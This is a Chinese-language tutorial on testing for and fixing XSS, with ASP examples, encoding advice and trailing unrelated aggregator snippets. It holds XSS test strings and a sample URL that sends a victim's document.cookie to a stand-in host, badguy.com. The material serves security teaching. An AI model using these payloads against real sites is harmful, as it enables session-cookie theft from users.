news 2026/7/4 15:31:55

Web安全测试之XSS

作者头像

张小明

前端开发工程师

1.2k 24
文章封面图
Web安全测试之XSS

假如有下面一个textbox

<input type="text" name="address1" value="value1from">

value1from是来自用户的输入,如果用户不是输入value1from,而是输入 "/><script>alert(document.cookie)</script><!- 那么就会变成

<input type="text" name="address1" value=""/><script>alert(document.cookie)</script><!- ">

嵌入的JavaScript代码将会被执行

或者用户输入的是 "onfocus="alert(document.cookie) 那么就会变成

<input type="text" name="address1" value="" onfocus="alert(document.cookie)">

事件被触发的时候嵌入的JavaScript代码将会被执行

攻击的威力,取决于用户输入了什么样的脚本

当然用户提交的数据还可以通过QueryString(放在URL中)和Cookie发送给服务器. 例如下图

HTML Encode

XSS之所以会发生, 是因为用户输入的数据变成了代码。 所以我们需要对用户输入的数据进行HTML Encode处理。 将其中的"中括号", “单引号”,“引号” 之类的特殊字符进行编码。

在C#中已经提供了现成的方法,只要调用HttpUtility.HtmlEncode("string <scritp>") 就可以了。 (需要引用System.Web程序集)

Fiddler中也提供了很方便的工具, 点击Toolbar上的"TextWizard" 按钮

XSS 攻击场景

1. Dom-Based XSS 漏洞 攻击过程如下

Tom 发现了Victim.com中的一个页面有XSS漏洞,

例如: http://victim.com/search.asp?term=apple

服务器中Search.asp 页面的代码大概如下

<html> <title></title> <body> Results for <%Reequest.QueryString("term")%> ... </body> </html>

Tom 先建立一个网站http://badguy.com, 用来接收“偷”来的信息。
然后Tom 构造一个恶意的url(如下), 通过某种方式(邮件,QQ)发给Monica

http://victim.com/search.asp?term=<script>window.open("http://badguy.com?cookie="+document.cookie)</script>

Monica点击了这个URL, 嵌入在URL中的恶意Javascript代码就会在Monica的浏览器中执行. 那么Monica在victim.com网站的cookie, 就会被发送到badguy网站中。这样Monica在victim.com 的信息就被Tom盗了.

2. Stored XSS(存储式XSS漏洞), 该类型是应用广泛而且有可能影响大Web服务器自身安全的漏洞,攻击者将攻击脚本上传到Web服务器上,使得所有访问该页面的用户都面临信息泄露的可能。 攻击过程如下

Alex发现了网站A上有一个XSS 漏洞,该漏洞允许将攻击代码保存在数据库中,

Alex发布了一篇文章,文章中嵌入了恶意JavaScript代码。

其他人如Monica访问这片文章的时候,嵌入在文章中的恶意Javascript代码就会在Monica的浏览器中执行,其会话cookie或者其他信息将被Alex盗走。

Dom-Based XSS漏洞威胁用户个体,而存储式XSS漏洞所威胁的对象将是大量的用户.

XSS 漏洞修复

原则: 不相信客户输入的数据
注意: 攻击代码不一定在<script></script>中

  1. 将重要的cookie标记为http only, 这样的话Javascript 中的document.cookie语句就不能获取到cookie了.
  2. 只允许用户输入我们期望的数据。 例如: 年龄的textbox中,只允许用户输入数字。 而数字之外的字符都过滤掉。
  3. 对数据进行Html Encode 处理
  4. 过滤或移除特殊的Html标签, 例如: <script>, <iframe> , &lt; for <, &gt; for >, &quot for
  5. 过滤JavaScript 事件的标签。例如 "onclick=", "onfocus" 等等。

如何测试XSS漏洞

方法一: 查看代码,查找关键的变量, 客户端将数据传送给Web 服务端一般通过三种方式 Querystring, Form表单,以及cookie. 例如在ASP的程序中,通过Request对象获取客户端的变量

<% strUserCode = Request.QueryString(“code”); strUser = Request.Form(“USER”); strID = Request.Cookies(“ID”); %>

假如变量没有经过htmlEncode处理, 那么这个变量就存在一个XSS漏洞

方法二: 准备测试脚本,

"/><script>alert(document.cookie)</script><!-- <script>alert(document.cookie)</script><!-- "onclick="alert(document.cookie)

在网页中的Textbox或者其他能输入数据的地方,输入这些测试脚本, 看能不能弹出对话框,能弹出的话说明存在XSS漏洞

在URL中查看有那些变量通过URL把值传给Web服务器, 把这些变量的值退换成我们的测试的脚本。 然后看我们的脚本是否能执行

方法三: 自动化测试XSS漏洞
现在已经有很多XSS扫描工具了。 实现XSS自动化测试非常简单,只需要用HttpWebRequest类。 把包含xss 测试脚本。发送给Web服务器。 然后查看HttpWebResponse中,我们的XSS测试脚本是否已经注入进去了。

HTML Encode 和URL Encode的区别

刚开始我老是把这两个东西搞混淆, 其实这是两个不同的东西。

HTML编码前面已经介绍过了,关于URL 编码是为了符合url的规范。因为在标准的url规范中中文和很多的字符是不允许出现在url中的。

例如在baidu中搜索"测试汉字"。 URL会变成
http://www.baidu.com/s?wd=%B2%E2%CA%D4%BA%BA%D7%D6&rsv_bp=0&rsv_spt=3&inputT=7477

所谓URL编码就是: 把所有非字母数字字符都将被替换成百分号(%)后跟两位十六进制数,空格则编码为加号(+

在C#中已经提供了现成的方法,只要调用HttpUtility.UrlEncode("string <scritp>") 就可以了。 (需要引用System.Web程序集)

Fiddler中也提供了很方便的工具, 点击Toolbar上的"TextWizard" 按钮

浏览器中的XSS过滤器

为了防止发生XSS, 很多浏览器厂商都在浏览器中加入安全机制来过滤XSS。 例如IE8,IE9,Firefox, Chrome. 都有针对XSS的安全机制。 浏览器会阻止XSS。 例如下图

如果需要做测试, 最好使用IE7。

ASP.NET中的XSS安全机制

ASP.NET中有防范XSS的机制,对提交的表单会自动检查是否存在XSS,当用户试图输入XSS代码的时候,ASP.NET会抛出一个错误如下图

版权声明: 本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
网站建设 2026/7/4 15:30:58

机器学习生产化实战:从Notebook到K8s的模型服务落地指南

1. 项目概述&#xff1a;这不是一次“部署”&#xff0c;而是一场从实验室到产线的系统性迁移 “From Notebook to Production: Running ML in the Real World (Part 4)”——这个标题里藏着太多被轻描淡写却重若千钧的词。“Notebook”不是指纸质本子&#xff0c;而是Jupyter里…

作者头像 李华
网站建设 2026/7/4 15:28:48

五类AI加速器的本质差异与选型逻辑

1. 项目概述&#xff1a;这不是五种“芯片型号”&#xff0c;而是五种截然不同的加速哲学“5 Types of ML Accelerators”这个标题乍看像一份硬件选型清单&#xff0c;但如果你真把它当成“买哪款卡更划算”的导购文&#xff0c;就完全误读了它的底层逻辑。我在AI基础设施一线摸…

作者头像 李华
网站建设 2026/7/4 15:25:38

WebAssembly在前端加密安全中的应用:航信加密模块实战解析

1. 项目概述&#xff1a;当航信加密遇上WebAssembly 最近在分析一些企业级前端安全方案时&#xff0c;SGUI航信加密模块这个项目引起了我的注意。乍一看标题&#xff0c;它融合了两个看似不相关的领域&#xff1a;一个是传统、封闭且对安全性要求极高的“航信加密模块”&#x…

作者头像 李华
网站建设 2026/7/4 15:25:13

MC6470与PIC18F85J50的6DOF IMU系统开发实践

1. 项目背景与硬件选型解析 在嵌入式系统开发中&#xff0c;精确的运动感知和位置追踪一直是颇具挑战性的任务。MC6470作为mCube推出的6自由度惯性测量单元(6DOF IMU)&#xff0c;集成了三轴加速度计和三轴磁力计&#xff0c;能够提供2g至16g的可调加速度测量范围和2.4mT的磁场…

作者头像 李华
网站建设 2026/7/4 15:22:01

终极Android VNC客户端指南:AVNC让你随时随地掌控远程电脑

终极Android VNC客户端指南&#xff1a;AVNC让你随时随地掌控远程电脑 【免费下载链接】avnc VNC Client for Android 项目地址: https://gitcode.com/gh_mirrors/avn/avnc AVNC是一款专为Android设备设计的免费开源VNC客户端&#xff0c;让您能够在手机上轻松远程控制W…

作者头像 李华
网站建设 2026/7/4 15:21:17

从信息泄露到RCE:实战漏洞链构建与防御策略

1. 项目概述&#xff1a;从“不起眼”到“致命一击”的漏洞链艺术在渗透测试和红队评估的实战中&#xff0c;我们常常会遇到一种令人沮丧又兴奋的局面&#xff1a;发现了一个看似“低危”甚至“无伤大雅”的漏洞&#xff0c;比如一个目录遍历、一个信息泄露&#xff0c;或者一个…

作者头像 李华